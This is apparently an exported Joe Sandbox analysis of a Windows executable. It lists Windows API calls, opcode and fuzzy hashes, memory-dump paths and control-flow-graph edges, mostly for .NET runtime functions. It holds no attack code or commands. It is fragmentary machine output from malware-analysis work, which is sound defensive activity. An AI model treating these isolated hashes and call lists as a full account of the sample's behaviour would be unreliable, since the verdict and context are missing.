                                                        • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                                                        • API String ID: 3706814929-926682358
                                                        • Opcode ID: 4d4b1c8a821366a58e13932409344ef9bc2e3fedc110d7540238142b7d2ce7dd
                                                        • Instruction ID: b2f3f197742d86d0d92ba4136047067ae63bd7f09805ec0a7722aff2621b9367
                                                        • Opcode Fuzzy Hash: 4d4b1c8a821366a58e13932409344ef9bc2e3fedc110d7540238142b7d2ce7dd
                                                        • Instruction Fuzzy Hash: 15416731919B4286E7D0EB25E494379BBA0EF08789F844037D94D537A4DF3DE550C712

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                                                        • String ID:
                                                        • API String ID: 2150560229-0
                                                        • Opcode ID: 797a42ad1a02e68e8dda0a1c160f46f9bccc89019008f5d8015a25128a62028d
                                                        • Instruction ID: 27db71f1d9c39b1034729d8f08cd4cdb0bb0078717575abcaf52845281bdb4fb
                                                        • Opcode Fuzzy Hash: 797a42ad1a02e68e8dda0a1c160f46f9bccc89019008f5d8015a25128a62028d
                                                        • Instruction Fuzzy Hash: 2EE0E5A5A0470186FB44AB32A81433597916F99B85F881134CD4E56360EF3D92494510

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 119 7ff7e3581e90-7ff7e3581ec1 120 7ff7e3581ec7-7ff7e3581ee2 GetCurrentProcess call 7ff7e35d8a6f 119->120 121 7ff7e3581f7f-7ff7e3581f9c GlobalMemoryStatusEx 119->121 120->121 134 7ff7e3581ee8-7ff7e3581ef0 120->134 123 7ff7e3582022-7ff7e3582025 121->123 124 7ff7e3581fa2-7ff7e3581fa5 121->124 125 7ff7e358202e-7ff7e3582031 123->125 126 7ff7e3582027-7ff7e358202b 123->126 128 7ff7e3581fa7-7ff7e3581fb2 124->128 129 7ff7e3582011-7ff7e3582014 124->129 132 7ff7e358203b-7ff7e358203e 125->132 133 7ff7e3582033-7ff7e3582038 125->133 126->125 135 7ff7e3581fbb-7ff7e3581fcc 128->135 136 7ff7e3581fb4-7ff7e3581fb9 128->136 130 7ff7e3582019-7ff7e358201c 129->130 131 7ff7e3582016 129->131 137 7ff7e358201e-7ff7e3582020 130->137 138 7ff7e3582048-7ff7e358206b call 7ff7e35d8e50 130->138 131->130 132->138 139 7ff7e3582040 132->139 133->132 140 7ff7e3581f5a-7ff7e3581f5f 134->140 141 7ff7e3581ef2-7ff7e3581ef8 134->141 142 7ff7e3581fd0-7ff7e3581fe1 135->142 136->142 145 7ff7e3582045 137->145 139->145 143 7ff7e3581f71-7ff7e3581f74 140->143 144 7ff7e3581f61-7ff7e3581f64 140->144 146 7ff7e3581efa-7ff7e3581eff 141->146 147 7ff7e3581f01-7ff7e3581f15 141->147 149 7ff7e3581fea-7ff7e3581ffe 142->149 150 7ff7e3581fe3-7ff7e3581fe8 142->150 143->138 154 7ff7e3581f7a 143->154 152 7ff7e3581f6b-7ff7e3581f6e 144->152 153 7ff7e3581f66-7ff7e3581f69 144->153 145->138 155 7ff7e3581f19-7ff7e3581f2a 146->155 147->155 151 7ff7e3582002-7ff7e358200e 149->151 150->151 151->129 152->143 153->143 154->145 157 7ff7e3581f2c-7ff7e3581f31 155->157 158 7ff7e3581f33-7ff7e3581f47 155->158 159 7ff7e3581f4b-7ff7e3581f57 157->159 158->159 159->140
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentGlobalMemoryProcessStatus
                                                        • String ID: @
                                                        • API String ID: 3261791682-2766056989
                                                        • Opcode ID: 08fb357760ee07a770a744109e7a6e344503c8149823deb5f180863c7e2f9c72
                                                        • Instruction ID: d51ac8df5b5e04118886f2e878879c8cf95c5fdb867e72498f3f03463a804f5d
                                                        • Opcode Fuzzy Hash: 08fb357760ee07a770a744109e7a6e344503c8149823deb5f180863c7e2f9c72
                                                        • Instruction Fuzzy Hash: DD412571A09B8681E996DB369110339EE526F59BC0F58CB32E90E3A744FF3DE4918621

                                                        Control-flow Graph

                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF7E359D839), ref: 00007FF7E35B0320
                                                        • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF7E359D839), ref: 00007FF7E35B0396
                                                        • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF7E359D839), ref: 00007FF7E35B03EE
                                                        • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF7E359D839), ref: 00007FF7E35B0414
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 900f00244c349463bb9bbf8e27b875c11dd4c8b86f50576fa13144f7e536b278
                                                        • Instruction ID: 1ee2065ccc3e85e8e7afc7e96870eaf1040c319d32e8aeee9389cfca8e1d1d4d
                                                        • Opcode Fuzzy Hash: 900f00244c349463bb9bbf8e27b875c11dd4c8b86f50576fa13144f7e536b278
                                                        • Instruction Fuzzy Hash: F6417F21A0C70692FAA0FB21E485775BA94BF14341FD60077D94D677A1DF3CE4608372

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 229 7ff7e358cd40-7ff7e358cd6d 230 7ff7e358cd6f 229->230 231 7ff7e358cd76-7ff7e358cd7e 230->231 232 7ff7e358cd80-7ff7e358cd8a call 7ff7e35b0690 231->232 233 7ff7e358cd8c-7ff7e358cdac 231->233 232->230 235 7ff7e358cdb2-7ff7e358cdb8 233->235 236 7ff7e358cea3-7ff7e358cea9 233->236 238 7ff7e358ce8d-7ff7e358ce98 235->238 239 7ff7e358cdbe 235->239 240 7ff7e358ceb6-7ff7e358ceb9 236->240 241 7ff7e358ceab-7ff7e358ceb1 call 7ff7e3593480 236->241 238->235 242 7ff7e358ce9e 238->242 243 7ff7e358cdc0-7ff7e358cdc6 239->243 245 7ff7e358cebf-7ff7e358cec6 240->245 246 7ff7e358cf7a-7ff7e358cf84 call 7ff7e35a49a0 240->246 241->240 242->236 250 7ff7e358ce32-7ff7e358ce42 call 7ff7e3579560 243->250 251 7ff7e358cdc8-7ff7e358cdd0 243->251 247 7ff7e358cf71-7ff7e358cf78 245->247 248 7ff7e358cecc-7ff7e358ced4 245->248 259 7ff7e358cf86-7ff7e358cf8c 246->259 260 7ff7e358cfec-7ff7e358cfef 246->260 247->246 253 7ff7e358cf22-7ff7e358cf36 call 7ff7e358d9f0 247->253 248->247 252 7ff7e358ceda-7ff7e358cf04 248->252 272 7ff7e358ce44-7ff7e358ce4b 250->272 273 7ff7e358ce66-7ff7e358ce6e 250->273 251->250 256 7ff7e358cdd2-7ff7e358cdd9 251->256 252->247 257 7ff7e358cf06-7ff7e358cf1d call 7ff7e35ae0c0 252->257 267 7ff7e358cf3b-7ff7e358cf45 253->267 262 7ff7e358ce29-7ff7e358ce30 SwitchToThread 256->262 263 7ff7e358cddb-7ff7e358cde8 256->263 257->253 270 7ff7e358cf9d-7ff7e358cfad call 7ff7e35b04d0 259->270 271 7ff7e358cf8e-7ff7e358cf91 259->271 260->253 269 7ff7e358cff5-7ff7e358d00d call 7ff7e358d470 260->269 268 7ff7e358ce83-7ff7e358ce87 262->268 264 7ff7e358ce08-7ff7e358ce0c 263->264 265 7ff7e358cdea 263->265 264->268 278 7ff7e358ce0e-7ff7e358ce16 264->278 274 7ff7e358cdf0-7ff7e358cdf4 265->274 267->231 279 7ff7e358cf4b-7ff7e358cf70 267->279 268->238 268->243 269->267 294 7ff7e358cfaf-7ff7e358cfb9 call 7ff7e35a49a0 270->294 295 7ff7e358cfbb-7ff7e358cfc1 270->295 271->270 281 7ff7e358cf93-7ff7e358cf98 call 7ff7e3593480 271->281 282 7ff7e358ce5c-7ff7e358ce61 call 7ff7e35826f0 272->282 283 7ff7e358ce4d-7ff7e358ce53 272->283 276 7ff7e358ce70-7ff7e358ce75 call 7ff7e35b0690 273->276 277 7ff7e358ce7a-7ff7e358ce7c 273->277 274->264 285 7ff7e358cdf6-7ff7e358cdfe 274->285 276->277 277->268 288 7ff7e358ce7e call 7ff7e35794e0 277->288 278->268 289 7ff7e358ce18-7ff7e358ce27 call 7ff7e3579560 SwitchToThread 278->289 281->270 282->273 283->282 292 7ff7e358ce55-7ff7e358ce5a SwitchToThread 283->292 285->264 293 7ff7e358ce00-7ff7e358ce06 285->293 288->268 289->277 292->273 293->264 293->274 294->260 294->295 299 7ff7e358cfc3-7ff7e358cfc6 295->299 300 7ff7e358cfcc-7ff7e358cfe7 call 7ff7e35ae0c0 295->300 299->253 299->300 300->260
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: SwitchThread
                                                        • String ID:
                                                        • API String ID: 115865932-0
                                                        • Opcode ID: 053cb21f2e7aa8d425844a9121586dfe66c792382e692f055b286bee1b8152ac
                                                        • Instruction ID: b4c58beb4f1ece5ea07ef6e770b48d6f05abbbf367f9270a1783c56b132703e1
                                                        • Opcode Fuzzy Hash: 053cb21f2e7aa8d425844a9121586dfe66c792382e692f055b286bee1b8152ac
                                                        • Instruction Fuzzy Hash: 42716821A0824386FAE5BB75A840735FE91AF48785F80013BE95D7A396DF3CF4508B62

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF7E3585158,?,?,0000000A,00007FF7E35841B0,?,?,00000000,00007FF7E357E8A1), ref: 00007FF7E3582767
                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF7E3585158,?,?,0000000A,00007FF7E35841B0,?,?,00000000,00007FF7E357E8A1), ref: 00007FF7E3582787
                                                        • VirtualAllocExNuma.KERNEL32 ref: 00007FF7E35827A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual$CurrentNumaProcess
                                                        • String ID:
                                                        • API String ID: 647533253-0
                                                        • Opcode ID: 0ee9833a7794a767601698390b6fdb287f23bc31715070173f580906f203b271
                                                        • Instruction ID: 6b9f810aea11c4385a3aed2d966ab4ddf66eb6411dacfb785574885096f5472d
                                                        • Opcode Fuzzy Hash: 0ee9833a7794a767601698390b6fdb287f23bc31715070173f580906f203b271
                                                        • Instruction Fuzzy Hash: 71F0A471B0869186FB609B16F404319EB61AB49BD4F880135EF4C6BB58CB3DD6858B10

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: EventRegister
                                                        • String ID: gcConservative
                                                        • API String ID: 3840811365-1953527212
                                                        • Opcode ID: ffe3c2faf81b3ef910fad80c62d0f8518216a282887ed91876dae107d6d140ff
                                                        • Instruction ID: 874a55d81332affcbf91ab34d37fc4f60e6f814c259fdd2eef179cd3c4243104
                                                        • Opcode Fuzzy Hash: ffe3c2faf81b3ef910fad80c62d0f8518216a282887ed91876dae107d6d140ff
                                                        • Instruction Fuzzy Hash: 1D310521A1864786EB80BB65E8C07B5BBA0FB48746FC00077D90D63761DF3CE668C762

                                                        Control-flow Graph

                                                        APIs
                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7E35D8E79,?,?,?,?,00007FF7E357D9D1,?,?,?,00007FF7E357DF4C,00000000,00000020,?), ref: 00007FF7E35D8D8A
                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7E35D8DA0
                                                          • Part of subcall function 00007FF7E35D97AC: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7E35D97B5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                        • String ID:
                                                        • API String ID: 205171174-0
                                                        • Opcode ID: 95691fa6baedfe018d50a01fc6fec94552b967e93a3eb7814b2b8a2ad8293209
                                                        • Instruction ID: c65b9b609baad2b919c1b7890338f84e0d366fc35580f4d5482a91759b20a077
                                                        • Opcode Fuzzy Hash: 95691fa6baedfe018d50a01fc6fec94552b967e93a3eb7814b2b8a2ad8293209
                                                        • Instruction Fuzzy Hash: A6E0EC02E0950791FDD9777218152B689400FAA774EED1B32D93E693C6AD3CA4518173

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeave
                                                        • String ID:
                                                        • API String ID: 3168844106-0
                                                        • Opcode ID: 30e9e35b31ec2547a70cda4d383b3805e38872ae1b4e46b8a6fe90720136f9e7
                                                        • Instruction ID: 20e4230cfe45d018393d4935f2589594e3c8f7443d7a60c5db52f784053c8657
                                                        • Opcode Fuzzy Hash: 30e9e35b31ec2547a70cda4d383b3805e38872ae1b4e46b8a6fe90720136f9e7
                                                        • Instruction Fuzzy Hash: BD419561A0864285EB90AB2AD590774BB50AF09BF5F850337D93CA77E9DF3CE064C352
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: d4ca215575fd0c6e0bae6fe572d759c8f06235c4c5b30343d008d1ca5d55f1ae
                                                        • Instruction ID: 546bab1dab656a8df8096e1de78aedc9010290730e4f27b1f98e9784dcdd2507
                                                        • Opcode Fuzzy Hash: d4ca215575fd0c6e0bae6fe572d759c8f06235c4c5b30343d008d1ca5d55f1ae
                                                        • Instruction Fuzzy Hash: F631F532B05B5182E654EB26E50022AA7A0FF49FD0F848136DF4C27B94DF3CE5628391
                                                        APIs
                                                          • Part of subcall function 00007FF7E35827D0: VirtualFree.KERNELBASE ref: 00007FF7E35827DA
                                                        • EnterCriticalSection.KERNEL32(?,?,?,00007FF7E35964F9,?,?,?,00007FF7E359C51D), ref: 00007FF7E35B0472
                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00007FF7E35964F9,?,?,?,00007FF7E359C51D), ref: 00007FF7E35B049C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$EnterFreeLeaveVirtual
                                                        • String ID:
                                                        • API String ID: 1320683145-0
                                                        • Opcode ID: b5911a8c8c100c65425a835202cd376d10abe74bf2f3be4458c4a8add018ab75
                                                        • Instruction ID: 8c3f86ec003fa2f74eb79ecf396e5d793486ad218c568ec87f4300f2a2f42afd
                                                        • Opcode Fuzzy Hash: b5911a8c8c100c65425a835202cd376d10abe74bf2f3be4458c4a8add018ab75
                                                        • Instruction Fuzzy Hash: 06F08121D0865250F6A0AB25F8C53B9BBA4FF44792FC60037E95D66A958F3CE471C3A2
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:
                                                        • API String ID: 2087232378-0
                                                        • Opcode ID: 21fe628a8c245d1f009263de4e24fe02042f17ce3a1401def6f39cd1a18418fe
                                                        • Instruction ID: 3b47b317314b7b719766f4f01df58cedda92025214c8898dae24185d90bb5556
                                                        • Opcode Fuzzy Hash: 21fe628a8c245d1f009263de4e24fe02042f17ce3a1401def6f39cd1a18418fe
                                                        • Instruction Fuzzy Hash: 30E0CD24F15101C1FB98AB2368457149B916F5D701FC48039C40D57350DD3D625B8B31
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: BreakDebug
                                                        • String ID:
                                                        • API String ID: 456121617-0
                                                        • Opcode ID: bb02521482f357d091ee9155b463287af1990604d8e730fb2d95daa1db2f584a
                                                        • Instruction ID: 3ceb49dba3ead9950532b388f5acf9991221b31022d36239b7aafc4f2b85a541
                                                        • Opcode Fuzzy Hash: bb02521482f357d091ee9155b463287af1990604d8e730fb2d95daa1db2f584a
                                                        • Instruction Fuzzy Hash: F541EA22F08A4242F690EB219442779AB91EB987E4F840237DE6D7B7C5CF3DE441C352
                                                        APIs
                                                        • CoInitializeEx.OLE32(?,?,?,?,00000010,?,?,?,?,?,?,?,00007FF7E361421E), ref: 00007FF7E3614312
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
                                                        • Associated: 00000000.00000002.1217621779.00007FF7E3570000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217762713.00007FF7E369D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217812162.00007FF7E36ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E376A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217881367.00007FF7E3770000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1217927613.00007FF7E3778000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff7e3570000_lgX7lgUL1w.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Initialize
                                                        • String ID:
                                                        • API String ID: 2538663250-0
                                                        • Opcode ID: abdcdcb704eea11be962c5435ee9f9ed110ffaba1fae7f9995d937fc0061dd4b
                                                        • Instruction ID: 020ed7705b02af77955155fbab36037b9453bd781344b69aef53a9f314d57b02
                                                        • Opcode Fuzzy Hash: abdcdcb704eea11be962c5435ee9f9ed110ffaba1fae7f9995d937fc0061dd4b
                                                        • Instruction Fuzzy Hash: A421D022E0C42655F7A2B67298013FDDA616F40794FD88033DD0C37B86DE7CAA838262
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1217645697.00007FF7E3571000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E3570000, based on PE: true
